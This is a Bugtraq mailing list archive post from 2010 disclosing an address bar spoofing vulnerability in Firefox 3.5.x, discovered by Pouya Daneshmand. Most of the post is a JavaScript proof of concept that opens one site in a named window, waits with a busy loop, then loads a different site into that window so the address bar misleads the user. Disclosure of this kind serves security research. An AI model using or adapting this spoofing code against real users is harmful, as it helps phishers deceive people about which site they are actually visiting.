Bugtraq mailing list archives
Mozilla Firefox 3.5.x Address Bar Spoofing Vulnerability
From: info () securitylab ir
Date: 21 Jul 2010 15:35:00 -0000
Spoof Code: <script language="javascript"> function pause(pd) { date = new Date(); var curDate = null; do { var curDate = new Date(); } while(curDate-date < pd); } function Spoofing () { win = window.open('http://www.google.com','new') pause (3000) win = window.open('http://www.Securitylab.ir','new') } </script> <a href="javascript: Spoofing()">Click Here</a> ######################################################################## Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com) Original Advisory: http://Securitylab.ir/Advisories
Current thread:
- Mozilla Firefox 3.5.x Address Bar Spoofing Vulnerability info (Jul 21)